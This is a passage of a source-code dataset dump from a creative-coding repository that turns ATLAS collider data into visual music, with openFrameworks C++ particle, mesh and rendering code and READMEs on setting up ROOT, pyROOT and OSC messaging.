system_2.addParticlesGroup(_groupPartsNum);\n    }\n    \n}\n\n//----------------------------------------------------------\nvoid ParticleSystemPair::setIsContinuum(bool state, float rate_ms){\n    \n    _bIsContinuum = state;\n    _continuum_rate_ms = rate_ms;\n    \n}\n//----------------------------------------------------------\nvoid ParticleSystemPair::reset(int x, int y, int w, int h){\n    \n    _x = x;\n    _y = y;\n    _w = w;\n    _h = h;\n    \n    system_1.setup(_x, _y, _w, _h, 1);\n    system_2.setup(_w, _y, _w, _h, -1);\n\n}\n//----------------------------------------------------------\nint ParticleSystemPair::getPartsNum(){\n    \n    return system_1.partGroups.size() + system_2.partGroups.size();\n}\n//----------------------------------\nvoid ParticleSystemPair::setColor(ofColor col){\n    _mainColor = col;\n    material.setDiffuseColor(_mainColor);//??? is diffuse the right property to set?\n}\n\n" }, { "alpha_fraction": 0.7858293056488037, "alphanum_fraction": 0.7890499234199524, "avg_line_length": 43.28571319580078, "blob_id": "b4abb670ba2ff9b85cfb7d5b4c14b5b1966f4e06", "content_id": "c7cf4412848090d2e3ce66e63d7b1e72516bd7ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 621, "license_type": "no_license", "max_line_length": 229, "num_lines": 14, "path": "/Graphics/examples/rendererExample/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "# VideoRenderer Example\n\n### Description\nExample app of the VideoRenderer class. 
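For orientation, here is a minimal usage sketch condensed from src/ofApp.cpp in this example (the calls below are taken from that file; treat this as an illustration rather than the complete API):\n\n```cpp\n// in setup(): frame rate, recording mode, output resolution\nrenderer.setup(FRAME_RATE, PNG_SEQUENCE, r1024);\n\n// in update(): draw the scene into the renderer's FBO, then let it record\nrenderer.getFbo()->begin();\nofClear(255);\ndrawTestScene(renderer.getFboWidth(), renderer.getFboHeight());\nrenderer.getFbo()->end();\nrenderer.update();\n\n// in draw(): scaled on-screen preview; startRecording()/stopRecording() toggle capture\nrenderer.draw(250, 0, 512, 512);\n```\n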
VideoRenderer renders the openGL context into a .mov video file or a PNG sequence.\n\n### Dependencies\n* addons: ofxVideoRecorder.\n* common_classes: VideoRenderer, ImageSaverThread.\n\n### Compilation\nThe Graphics Engine of the LHCVMM is developed using openFrameworks v0.9 (www.openFrameworks.com). To compile the examples in this repository you need to clone the lhcvmm main directory into the OF root dir (OF_ROOT_DIR/lhcvmm/Graphics/).\n\n### Running this example\nMake sure `ffmpeg` is installed and on your PATH for VideoRenderer to work, as it relies on ffmpeg. \n" }, { "alpha_fraction": 0.48721766471862793, "alphanum_fraction": 0.5043435096740723, "avg_line_length": 25.15584373474121, "blob_id": "e274754e428037f0113509af56240279c4a715d9", "content_id": "e095594fca9b82397defdd34e97b86c2bd0528fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4029, "license_type": "no_license", "max_line_length": 105, "num_lines": 154, "path": "/Graphics/apps/final/src/particleSystem/ParticleGroup.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n\n#include \"ParticleGroup.h\"\n\n\n//-----------------------------------------\n\nParticleGroup::ParticleGroup(int partsNum,int x, int y, int w, int d, float radiusInit, float angleInit){\n    \n    _w = w;\n    //_x = w/2;\n    _x = x;\n    _y = y;\n    _z = 0;\n    \n    _anchor.set(_x, _y, _z);\n    \n    \n    _dir = d;\n    _partsNum = partsNum;\n    \n    _size = 10;\n    \n    if(_dir <0)\n        _angle = 0.0;//starts from right\n    else\n        _angle = ofDegToRad(180.0);//starts from the left\n    \n    \n    _rotRadiusInit = ofRandom(-radiusInit, radiusInit);\n    _rotAngleInit = ofRandom(-angleInit, angleInit);\n    \n    for(int i=0; i<_partsNum ; i++){\n        ofVec3f pos(_x, _y, _z);\n        ofVec3f vel(0,0,0);\n        positions.push_back(pos);\n        velocities.push_back(vel);\n    }\n\n    frameCounter = 0;\n    \n}\n//-----------------------------------------\nvoid ParticleGroup::update(std::map<string, float>& data){\n    \n    float time = 0.03;\n    \n    \n    float velocityX = data.at(KEY_X_VELOCITY);\n    float velocityZ = velocityX;\n    float angleVar = data.at(KEY_ANGLE_VAR);\n    float radiusVar = data.at(KEY_RADIUS_VAR);\n    //nz\n    float amp_nzAngle = data.at(KEY_ANGLE_NZ_AMP);//0-2;\n    float freq_nzAngle = data.at(KEY_ANGLE_NZ_FREQ); //0.001 - 0.01\n    float amp_nzRad = data.at(KEY_RADIUS_NZ_AMP);//0-2\n    float freq_nzRad = data.at(KEY_RADIUS_NZ_FREQ); //1.0- 10\n    float amp_nzXpos = data.at(KEY_X_NZ_AMP);//0-ofgetWidth\n    float freq_nzXpos = data.at(KEY_X_NZ_FREQ); //0.01 - 0.1\n    \n    _size = data.at(KEY_PART_SIZE);\n    \n    \n    //anchor---------------------\n    _angle += time * _dir * _rotAngleInit + angleVar;\n    float radiusAnchor = (_w/2) - 100 ;\n    \n    \n    _anchor.x += _dir * time * velocityX;\n    \n    _anchor.y = _y + radiusAnchor * sin(_angle);\n    \n    float radiusParts = _rotRadiusInit + radiusVar;\n    \n    \n    \n    //set x,y,z\n    for(int i=0; i<_partsNum; i++){\n        \n        float thisAngle = _angle + ofDegToRad( (360.0/float(_partsNum)) * i);\n        float thisRadius = radiusParts;\n        float thisZpos = _anchor.x;\n        \n        //nz-------------------------\n        float elapsedTimeFramed = frameCounter * time;\n        float nzAngle = ofSignedNoise(elapsedTimeFramed * freq_nzAngle, i*0.1) * thisAngle * amp_nzAngle;\n        thisAngle += nzAngle;\n        \n        float nzRadius = ofNoise(thisAngle * freq_nzRad) * radiusParts * amp_nzRad;\n        thisRadius += nzRadius;\n        \n        float nzZpos = ofSignedNoise(thisAngle * freq_nzXpos) * amp_nzXpos;\n        thisZpos += nzZpos;\n        \n        \n        //-------------------------------------------\n        \n        velocities[i].z = thisRadius * cos(thisAngle);\n        velocities[i].y = 
thisRadius * sin(thisAngle);\n \n positions[i].z = _anchor.z + velocities[i].z;\n \n positions[i].y = _anchor.y + velocities[i].y;\n positions[i].x = thisZpos;\n \n }\n\n\n \n frameCounter++;\n \n}\n//-----------------------------------------\nvoid ParticleGroup::draw(){\n\n ofPushStyle();\n \n \n \n for(int i=0; i<positions.size(); i++){\n //ofDrawBox(positions[i],_size);\n ofDrawSphere(positions[i], _size);\n }\n\n //for lines--------\n \n// int numVertex = positions.size();\n// \n// GLfloat vertexes[numVertex * 3];//array of floats (numVertex *3) 3->x,y,z\n// int i=0;\n// for(float n=0; n<positions.size(); n++) {\n// ofVec3f vec\t\t\t= positions[n];\n// vertexes[i*3]\t\t= vec.x;\n// vertexes[(i*3)+1] = vec.y;\n// vertexes[(i*3)+2] = vec.z;\n// i++;\n// }\n// glEnableClientState(GL_VERTEX_ARRAY);\n// glVertexPointer(3, GL_FLOAT, 0, vertexes);\n// ///glDrawArrays(GL_LINE_STRIP, 0, numVertex);\n// glDrawArrays(GL_LINE_LOOP, 0, numVertex);\n \n \n ofPopStyle();\n}\n//-----------------------------------------\nbool ParticleGroup::isOutOfBounds(int x_min, int x_max){\n \n bool b = false;\n \n if(_anchor.z<x_min|| _anchor.z>x_max){\n b = true;\n }\n \n return b;\n}" }, { "alpha_fraction": 0.4886685609817505, "alphanum_fraction": 0.523472249507904, "avg_line_length": 32.174495697021484, "blob_id": "1ab4c91aba678545a01801d966fb8b20bada86f7", "content_id": "345444de33fec10ea8e3e074ac801fc7dbc19fe8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4942, "license_type": "no_license", "max_line_length": 145, "num_lines": 149, "path": "/Graphics/apps/videoTest_3/src/cubeMesh/DisplacementSphereMesh.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n#include \"ofMain.h\"\n\nclass DisplacementSphereMesh {\n\t\npublic:\n \n // From GUI\n //float positionX;\n //float positionY;\n \n //OSC\n //bool isPlaying;\n //float touch_power;\n \n // Mesh\n ofLight light;\n\tofEasyCam cam;\n\tofVboMesh mainMesh;\n \n float *depths;\n float *speeds;\n float *forces;\n \n ofSpherePrimitive sphere;\n \n void setup() {\n sphere.setMode( OF_PRIMITIVE_TRIANGLES );\n sphere.setRadius(150);\n //sphere.setResolution(96);\n sphere.setResolution(48);\n mainMesh = sphere.getMesh();\n //mainMesh.enableColors();\n depths = new float[sphere.getMesh().getNumVertices()];\n speeds = new float[sphere.getMesh().getNumVertices()];\n forces = new float[sphere.getMesh().getNumVertices()];\n for (int i = 0; i < sphere.getMesh().getNumVertices(); i++) {\n depths[i] = sphere.getMesh().getVertices()[i].length();\n speeds[i] = 0;\n forces[i] = 0;\n }\n }\n \n void update() {\n update(0.5, 0.5, 0.01);\n }\n \n void update(float mouseX, float mouseY, float volume, int curentFrame = -1) {\n mainMesh = sphere.getMesh();\n float time = .02 * ofGetFrameNum();\n if (curentFrame != -1) time = 0.02 * curentFrame;\n float index = 1.0 * (ofGetFrameNum()) / 20;\n for (int i = 0; i < mainMesh.getNumVertices(); i++) {\n ofVec3f v = mainMesh.getVertex(i);\n float displace = ofNoise(v.x * 1.1 * mouseX * (0.02 + volume), v.y * 2.1 * mouseX * (0.02 + volume), time * 1.2 + 30 + 2. * volume);\n displace += 10.0 * ofNoise(v.x * 0.01, v.y * 0.01, time * .3) * 1.0 * volume;\n v = v + mainMesh.getNormal(i) * displace * (0.01 + volume * volume) * 10000. 
* mouseY;\n            mainMesh.setVertex(i, v);\n        }\n        setNormals(mainMesh);\n    }\n    \n    void update(float mouseX, float mouseY, float volume, float radius, float resolution, int curentFrame = -1) {\n        //  sphere.setRadius(radius);\n        ofSpherePrimitive sph = sphere;\n        sphere.setRadius(radius);\n        sphere.setResolution(resolution);\n        mainMesh = sphere.getMesh();\n        \n        float time = .02 * ofGetFrameNum();\n        if (curentFrame != -1) time = 0.02 * curentFrame;\n        float index = 1.0 * (ofGetFrameNum()) / 20;\n        for (int i = 0; i < mainMesh.getNumVertices(); i++) {\n            ofVec3f v = mainMesh.getVertex(i);\n            float displace = ofNoise(v.x * 1.1 * mouseX * (0.02 + volume), v.y * 2.1 * mouseX * (0.02 + volume), time * 1.2 + 30 + 2. * volume);\n            displace += 10.0 * ofNoise(v.x * 0.01, v.y * 0.01, time * .3) * 1.0 * volume;\n            v = v + mainMesh.getNormal(i) * displace * (0.01 + volume * volume) * 10000. * mouseY;\n            mainMesh.setVertex(i, v);\n        }\n        setNormals(mainMesh);\n    }\n    \n    void draw(bool triagles = false, bool type = false) {\n        //ofSetHexColor(0xffffff);\n        ofSetColor(255,150,100);\n        ofPushMatrix();\n        ofRotate(180, 0, 1, 0);\n        if (type == true) ofRotate(180, 0, 1, 0);\n        if (!triagles)\n            mainMesh.drawFaces();\n        \n        ofSetHexColor(0x333333);\n        ofSetLineWidth(1.0);\n        ofEnableSmoothing();\n        if (triagles)\n            mainMesh.drawWireframe();\n        ofSetHexColor(0xffffff);\n        ofPopMatrix();\n    }\n    \n    \n    \n    \n    \n    //Universal function which sets normals for the triangle mesh\n    void setNormals( ofMesh &mesh ){\n        \n        //The number of the vertices\n        int nV = mesh.getNumVertices();\n        \n        //The number of the triangles\n        int nT = mesh.getNumIndices() / 3;\n        \n        vector<ofPoint> norm( nV ); //Array for the normals\n        \n        //Scan all the triangles. For each triangle add its\n        //normal to norm's vectors of triangle's vertices\n        for (int t=0; t<nT; t++) {\n            \n            //Get indices of the triangle t\n            int i1 = mesh.getIndex( 3 * t );\n            int i2 = mesh.getIndex( 3 * t + 1 );\n            int i3 = mesh.getIndex( 3 * t + 2 );\n            \n            //Get vertices of the triangle\n            const ofPoint &v1 = mesh.getVertex( i1 );\n            const ofPoint &v2 = mesh.getVertex( i2 );\n            const ofPoint &v3 = mesh.getVertex( i3 );\n            \n            //Compute the triangle's normal\n            //!!! formula for computing the normal\n            ofPoint dir = -( (v2 - v1).crossed( v3 - v1 ) ).normalized();\n            \n            //Accumulate it to norm array for i1, i2, i3\n            norm[ i1 ] += dir;\n            norm[ i2 ] += dir;\n            norm[ i3 ] += dir;\n        }\n        \n        //Normalize the normal's length\n        for (int i=0; i<nV; i++) {\n            norm[i].normalize();\n        }\n        \n        //Set the normals to mesh\n        mesh.clearNormals();\n        mesh.addNormals( norm );\n    }\n};" }, { "alpha_fraction": 0.7747554779052734, "alphanum_fraction": 0.7750611305236816, "avg_line_length": 34.182796478271484, "blob_id": "f0f62593295b1fe6389a7477642cab624b3d1cf2", "content_id": "ce17f571dc1abadcfd64a1ec741110a996d137f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3272, "license_type": "no_license", "max_line_length": 719, "num_lines": 93, "path": "/Data/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "# lhcvmm\nLarge Hadron Collider Visual Music Machine - Data layer\n\nThis python program drives ATLAS collision data through OSC to both openFrameworks and SuperCollider.\nIt could also be possible to have other \"interpreters\" in the future listening to the same messages (like some arduino based machine).\n\n## Directory Structure\n\n* data_files: Here is where you download ROOT data files. 
They are excluded from the repository to keep it slim.\n\n\n## Getting started\n\nTo get this working you should have the ROOT framework with the pyROOT binding enabled on your machine.\nIf you don't, the program will simulate some random data so you can run a quick and dirty test.\n\n\n### Installing ROOT\n\nYou can, of course, build it yourself. But CERN provides binaries here: https://root.cern.ch/downloading-root\nOnce installed, source it in your terminal to have the ROOT executables available on your PATH.\n\n```bash\n\ncd /path/to/ROOT/ && source bin/thisroot.sh\n\n```\n\n### Check Installation\n\nCheck that ROOT is available by typing:\n\n```bash\n\nroot\n.q #to quit\n\n```\n\nCheck the python binding (pyROOT):\n\n```bash\n\npython -c 'import ROOT'\n\n```\nIf you receive a message like `ImportError: No module named ROOT`, pyROOT is not properly installed.\n\n### Starting the OSC listener\n\nThe `receiveOsc.sde` file serves as an example of receiving OSC messages from this program.\nOpen it in SuperCollider before running this program.\n\n### Starting the program\n\nSimply execute\n\n```bash\n\npython lhcvmm.py\n\n```\n\n\n## Troubleshooting\n\nYou may have `libPyROOT.so` compiled with a different version of python than the one you use to run `lhcvmm.py`.\nIn that case, find out which version of python you should be using to match the one `libPyROOT.so` was built with.\n\nOSX:\n\n```bash\n\notool -L /path/to/ROOT/lib/libPyROOT.so\n\n```\n\nLinux:\n\n```bash\n\nldd /path/to/ROOT/lib/libPyROOT.so\n\n```\n\n\n### To Do\n\nInstead of sending messages to a single server, this will work on a subscription/unsubscription pattern.\n\nThe OSCMultiClient supports:\n\n* Sending a specific OSC-message to multiple remote servers\n* Remote server subscription / unsubscription (through OSC-messages, of course)\n* Message-address filtering.\n\n-------------------\n\nThe OSCMultiClient supports 'multiple unicasting' of OSC-messages. This means that a given OSC-message can be sent to multiple servers, each with their own IP-address. This is different from sending OSC-messages to a specific multicast or broadcast IP-address (which is also supported, of course). If you want to have multiple clients controlling, and receiving replies from, one OSC-server, it's difficult to say which approach, multiple-unicast, multicast or broadcast, is 'best'. This depends mostly on your network-topology. Multicasting is not supported by all routers, and broadcasting generally only works within your local subnet, but both of these methods produce less network-traffic than multiple-unicasting.\n\nTo allow for dynamic configuration of which remote clients will receive reply-messages from the OSCMultiClient, an OSC-server that is bound to an OSCMultiClient supports client subscription. 
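For instance, a client built with ofxOsc (the OSC addon already used by the Graphics layer) could subscribe itself along these lines. This is only a sketch: the host, port and argument layout are assumptions, since the exact message format the server expects is not pinned down here.\n\n```cpp\nofxOscSender sender;\nsender.setup(\"127.0.0.1\", 12345); // hypothetical host/port of the lhcvmm OSC server\n\nofxOscMessage m;\nm.setAddress(\"/subscribe\"); // the server's subscription address\nm.addStringArg(\"192.168.0.10:12346\"); // assumed argument: where reply-messages should be sent\nsender.sendMessage(m, false);\n```\n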
By sending messages to the server's '/subscribe' and '/unsubscribe' OSC-addresses, clients can (un)subscribe themselves (or any other client) to receive reply-messages from the OSCMultiClient.\n\nMore info: https://trac.v2.nl/wiki/pyOSC\n" }, { "alpha_fraction": 0.6003130078315735, "alphanum_fraction": 0.6172143816947937, "avg_line_length": 21.314685821533203, "blob_id": "5839317c302d9f09a348cef9121f9c9787374f92", "content_id": "1ce37b7c58c316bb271396f6df9c49acab251f2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3195, "license_type": "no_license", "max_line_length": 56, "num_lines": 143, "path": "/Graphics/apps/videoTest_3/src/instanced/instancedManager.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n\n#pragma once\n\n#include \"ofMain.h\"\n#include \"ofxGui.h\"\n\n//---------------\n#define MAX_CUBESIZE 0.02\n#define MAX_H_RES 200\n#define MAX_V_RES 100\n#define MAX_VELOCITY 10\n\n#define MAX_NZ_TIME 50\n\n#define MAX_NZ_AMP 0.6\n#define MAX_NZ_FREQ 0.1\n#define MAX_NZ_RUG 0.03\n\n\n//-----------------------\n\nenum InstancedMode {\n LINEAL,\n RAD_CONCENTRIC,\n RAD_CENTRIFUGE\n};\n\nclass InstancedManager {\n\npublic:\n \n void setup(int fboWidth);\n void update();\n void drawScene();\n void exit(){};\n \n \n void setupGui();\n void drawGui();\n \n \n void setMode(InstancedMode m){_mode = m;}\n void setWidth(float w){_width = w*Lim.x;}\n void setHeight(float h){_height= h*Lim.y*2;}\n void setHres(int res){_hRes=res;}\n void setVres(int res){_vRes=res;}\n void setVelocity(float vel){velX = vel;}\n void setNzTime(float t){noiseTime = t;}\n void setXnzFreq(float f){xNoiseFreq = f;}\n void setXnzAmp(float a) {xNoiseAmp = a;}\n void setXnzRug(float r){xNoiseRug = r;}\n void setYnzFreq(float f){yNoiseFreq = f;}\n void setYnzAmp(float a) {yNoiseAmp = a;}\n void setYnzRug(float r){yNoiseRug = r;}\n void setZnzFreq(float f){zNoiseFreq = f;}\n void setZnzAmp(float a) {zNoiseAmp =a;}\n void setZnzRug(float r){zNoiseRug = r;}\n void setLimits(ofVec3f vec){Lim = vec;}\n void setCubeSize(float val);\n void setCubeSize(ofVec3f size);\n void setXpos(float val){xPos = val;}\n void setYpos(float val){yPos=val;}\n void setZpos(float val){zPos=val;}\n void setRadDeform(float val){radDeform = val;}\n void setOrientation(ofVec3f vec){Orient=vec;}\n void setQuilombo(bool b){bDoQuilombo=b;}\n void setMaskRadius(float radius){maskRadius=radius;}\n void setColor(ofColor col){\n mainColor=col;\n material.setDiffuseColor(mainColor);\n }\n \n float getCubeSize(){return cubeSize;}\n \n \n\n \n InstancedMode _mode;\n \n ofVec3f Lim, Orient;\n \n ofVboMesh\tvboMesh;\n ofShader shaderInst;\n \n ofColor mainColor;\n \n float maskRadius;\n \n float _width, _height;\n int _hRes, _vRes;\n int _fboWidth;\n \n float xPos, yPos, zPos;\n \n float radDeform = 0.0;\n \n float velX = 5.0;\n float vSpacing=.5;\n \n float noiseTime = 1.0;\n \n float xNoiseFreq = 0.01;\n float xNoiseAmp = 2.0;\n float xNoiseRug = 2.0;\n \n float yNoiseFreq = 0.01;\n float yNoiseAmp = 2.0;\n float yNoiseRug = 2.0;\n \n float zNoiseFreq = 0.01;\n float zNoiseAmp = 2.0;\n float zNoiseRug = 2.0;\n \n float cubeSize;\n \n bool bDoQuilombo;\n \n int velCounter;\n float YnzCounter;\n \n ofMaterial material;\n \n //gui----------------\n //instanced gui----------------\n ofxPanel guiInstanced;\n ofxToggle gMode, gRadMode;\n ofxFloatSlider gRadDeform;\n \n ofxFloatSlider gWidth, gHeight, gHres,\n gVres, gVelocity, gYpos, gXpos, gZpos;\n \n ofxVec3Slider gCubesize;\n 
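// scalar cube-size control; the app's update path scales it by MAX_CUBESIZE (see setCubeSize)\n    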
ofxFloatSlider gCubesizeUnified;\n \n ofxFloatSlider gMaskRadius;\n \n ofxFloatSlider gNzTime;\n ofxFloatSlider gNzXAmp, gNzXRug, gNzXFreq;\n ofxFloatSlider gNzYAmp, gNzYRug, gNzYFreq;\n ofxFloatSlider gNzZAmp, gNzZRug, gNzZFreq;\n \n\n\n};\n\n\n" }, { "alpha_fraction": 0.5899999737739563, "alphanum_fraction": 0.6449999809265137, "avg_line_length": 12.333333015441895, "blob_id": "2067565e5d3f10ba0233eda0ce1c3e42bd77d1bd", "content_id": "8d8f8ea3007ca5298531d2715bbfd12d4841cb16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 200, "license_type": "no_license", "max_line_length": 34, "num_lines": 15, "path": "/Graphics/apps/videoTest_2/src/Constants.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "//\n// Constants.h\n// videoTest_2\n//\n// Created by Leo on 4/13/16.\n//\n//\n\n#ifndef Constants_h\n#define Constants_h\n\n#define FRAME_RATE 30\n#define DURATION 45.0 //in seconds\n\n#endif /* Constants_h */\n" }, { "alpha_fraction": 0.5131714344024658, "alphanum_fraction": 0.5330389738082886, "avg_line_length": 29.990877151489258, "blob_id": "d4cd2b05ffe6c464439d48006630822c44e811e2", "content_id": "b81b23ddee61fb7a8ce880da9f7dd16e65912a14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 27180, "license_type": "no_license", "max_line_length": 143, "num_lines": 877, "path": "/Graphics/apps/videoTest_3/src/ofApp.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#include \"ofApp.h\"\n\n//FIXME: esta dado vuelta con el post-processing? no me importa mucho...\n//TODO: make all animations frameNum dependants\n\n#pragma mark - Core Funcs\n//--------------------------------------------------------------\nvoid ofApp::setup(){\n \n ofSetBackgroundColor(0);\n ///FRAME RATE: 30\n ofSetFrameRate(FRAME_RATE);\n ofSetLogLevel(OF_LOG_VERBOSE);\n ofEnableAlphaBlending();\n ofEnableDepthTest();\n \n //Setup settings-----------------\n data.load(\"analysisData.xml\");\n \n int frameRate = data.getValue(\"FILE-INFO:frameRate\",0);\n int totalFramesNum = data.getValue(\"FILE-INFO:totalFramesNum\", 0);\n cout<<\"frameRate - \"<<frameRate<<endl;\n cout<<\"total frames - \"<<totalFramesNum<<endl;\n \n //renderer setup-------------------\n \n framesMaxNumber = totalFramesNum;\n frameCounter = -1;\n isAnimating = false;\n ofLogVerbose()<<\"ANIMATION INFO ---- \";\n \n \n fisheye.setup(tVariableFisheye);\n fisheyeAmount = 0.0;\n \n //renderer.setup(FRAME_RATE, PNG_SEQUENCE, r256);///init resolution and mode\n //renderer.setup(FRAME_RATE, PNG_SEQUENCE, r512);///init resolution and mode\n //renderer.setup(FRAME_RATE, PNG_SEQUENCE, r1024);///init resolution and mode\n //renderer.setup(FRAME_RATE, PNG_SEQUENCE, r2048);///init resolution and mode\n renderer.setup(FRAME_RATE, PNG_SEQUENCE, r4096);///init resolution and mode\n \n \n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n \n //\n \n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n fw = drawFbo.getWidth();\n fh = drawFbo.getHeight();\n \n fboPost.allocate(fw, fh);\n fboPost.begin();\n ofClear(0,0,0,1);\n fboPost.end();\n \n fboInstanced.allocate(fw, fh, GL_RGBA);\n fboInstanced.begin();\n ofClear(255,255,255, 0);\n fboInstanced.end();\n \n fboParticles.allocate(fw, fh, GL_RGBA);\n fboParticles.begin();\n ofClear(255,255,255, 0);\n fboParticles.end();\n \n fboSphere.allocate(fw, fh, GL_RGBA);\n fboSphere.begin();\n ofClear(255,255,255, 0);\n fboSphere.end();\n \n \n 
//gui-------------\n setupGui();\n bShowGuiCubeSphere =false;\n bShowGuiPair = bShowGuiInstanced = true;\n \n \n //----------------------------\n _center.set(fw*0.5, fh*0.5, 0.0);\n cam.disableMouseInput();\n cam.setPosition(ofVec3f(_center.x, _center.y, fw*0.7));\n cam.lookAt(_center);\n cam.setTarget(_center);\n \n light.setPosition(fw*0.2, fw*.5, fh*0.3);\n light.setPointLight();\n \n //Instanced---------------------------\n instanced.setup(fw);\n instanced.setLimits(ofVec3f(fw, fh, 100));\n instanced.setOrientation(ofVec3f(1,1,1));\n instanced.setColor(COLOR_INSTANCED);\n \n //Particles------------------\n pair.setup(0, fh*0.5, fw, fh, OUT);\n pair.setColor(COLOR_PARTICLES);\n \n //Sphere------------------------\n sphere.setup();\n sphere.setColor(COLOR_SPHERE);\n sphere.setPosition(_center);\n \n //Post-Procesing-------------------------------\n postManager.setup(fw, fh);\n \n //OSC------------------------------------------\n receiver.setup(PORT);\n oscPower = 0.0;\n oscFreq = 0.0;\n oscConfidence = 0.0;\n oscSalience = 0.0;\n oscHfc = 0.0;\n oscCentroid = 0.0;\n oscSpecComp = 0.0;\n oscInharm = 0.0;\n oscOnset = false;\n oscTLtrack = 0.0;\n \n \n lastFrameWithOnset = 0;\n isReallyOnset = false;\n \n \n}\n\n//--------------------------------------------------------------\nvoid ofApp::update(){\n //display frame rate as window title\n ofSetWindowTitle(ofToString(ofGetFrameRate()));\n \n //animation frameNumUpdate\n if(isAnimating){\n frameCounter++;\n //end recording and animation at 15\"\n if (frameCounter>=framesMaxNumber){\n stopAnimation();\n renderer.stopRecording();\n }\n }\n \n \n //receiveOsc----------------\n if(gReceiveOSC){\n //receiveOsc();\n updateOscFromDataFile(frameCounter);\n }else{\n \n }\n \n //check trigger onset---------------------\n if(oscOnset && isAnimating){\n if(frameCounter-lastFrameWithOnset > 10){\n isReallyOnset = true;\n triggerOnset();\n lastFrameWithOnset = frameCounter;\n }\n }else{\n isReallyOnset=false;\n }\n\n \n //update graphics--------------------------------\n updateInstanced();\n updatePair();\n \n \n //update post-processing------------------------\n postManager.updateValues();\n \n //light pos\n light.setPosition(gLightPos->x * fw,\n gLightPos->y * 0.8*fw,\n 0.05 * 0.8*fw );\n \n \n\n ///-------------------------------\n \n \n //-----------------------------------\n \n int rw = renderer.getFboWidth();\n int rh = renderer.getFboHeight();\n \n ///draw openGL scene in drawFbo------------------\n drawFboInstanced();\n drawFboParticles();\n drawFboSphere();\n \n drawFboMain();\n \n drawFboPost();\n ///-------------------------------\n \n \n fisheyeAmount = 0.6;\n renderer.getFbo()->begin();\n ofClear(0);\n fisheye.begin(fboPost.getTexture(), rw, rh, fisheyeAmount);///which fbo to render\n glBegin(GL_QUADS);\n glTexCoord2f(0, 0); glVertex3f(0, 0, 0);\n glTexCoord2f(rw, 0); glVertex3f(rw, 0, 0);\n glTexCoord2f(rw, rh); glVertex3f(rw, rh, 0);\n glTexCoord2f(0,rh); glVertex3f(0, rh, 0);\n glEnd();\n fisheye.end();\n renderer.getFbo()->end();\n \n //Record Renderer's FBO into a .mov file or png sequence\n renderer.update();\n\n\n \n}\n\n//--------------------------------------------------------------\nvoid ofApp::draw(){\n \n ofBackground(0);\n \n \n //fboPost.draw(ofGetWidth()-768, 0, fw, fh);\n renderer.draw(ofGetWidth()-768, 0, 768, 768);\n\n \n //drawGuis------------------\n if (bShowGuiInstanced)\n instanced.drawGui();\n if(bShowGuiPair)\n guiPair.draw();\n if(bShowGuiCubeSphere)\n sphere.drawGui();\n \n guiMain.draw();\n \n 
postManager.drawGui(200,500);\n \n \n //Recording indicator-------------------\n if(renderer.getIsRecording()){\n ofPushStyle();\n ofPushMatrix();\n ofTranslate(ofGetWidth() - 60, 60);\n ofSetColor(255, 0, 0);\n ofDrawCircle(0,0, 40);\n ofSetColor(ofColor::white);\n ofDrawBitmapString(\"REC\", -10, 0);\n ofPopMatrix();\n ofPopStyle();\n }\n \n //Display Key commands-----------------\n ofPushStyle();\n string keys = \"KEY COMMANDS:\";\n keys += \"\\nSpacebar: START/STOP Animation\"\n \"\\nr: START/STOP Recording & Animation\"\n \"\\np: Secuencia Png\"\n \"\\nm: Archivo MOV-H264\"\n \"\\n1: 256x256\"\n \"\\n2: 512x512\"\n \"\\n3: 1024x1024\"\n \"\\n4: 2048x2048\"\n \"\\n5: 4096x4096\";\n ofSetColor(ofColor::white);\n ofDrawBitmapString(keys, ofGetWidth()-200, 20);\n ofPopStyle();\n \n //Display Info-----------------\n ofPushStyle();\n string info = \"INFO: \";\n info += \"\\nfps: \"+ofToString(ofGetFrameRate())\n + \"\\nFBO output res: \" + renderer.getResolutionAsString()\n + \"\\nREC mode: \" + renderer.getRecordingModeAsString() +\n + \"\\nframeCounter: \" + ofToString(frameCounter);\n if(renderer.getIsRecording()){\n info += \"\\nRECORDING FRAME NUM: \" + ofToString(ofGetFrameNum() - renderer.getLastFrameMarker());\n }\n ofSetColor(ofColor::yellow);\n ofDrawBitmapString(info, ofGetWidth()-200, ofGetHeight()-100);\n ofPopStyle();\n\n \n \n \n}\n\n\n//--------------------------------------------------------------\nvoid ofApp::keyPressed(int key){\n \n switch (key){\n case 'a':\n pair.addPartGroup(1);\n break;\n case 'k':\n pair.addPartGroup(2);\n break;\n \n \n \n //start-stop Animation--------------------\n case ' ':\n if(!isAnimating)startAnimation();\n else stopAnimation();\n break;\n //start-stop Animation & Recording---------------\n case 'r':\n if(!renderer.getIsRecording())renderer.startRecording();\n else renderer.stopRecording();\n \n if(!isAnimating)startAnimation();\n else stopAnimation();\n break;\n //FIXME: change resolutions arent working, setups needed\n //change resolution-----------------------------\n case '1':\n if(renderer.getOutputResolution()!= r256){\n renderer.setOutputResolution(r256);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n instanced.setLimits(ofVec3f(renderer.getFboWidth(), renderer.getFboHeight(), 100));\n \n fw = renderer.getFboWidth();\n fh = renderer.getFboHeight();\n \n fboPost.clear();\n fboPost.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboInstanced.clear();\n fboInstanced.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n 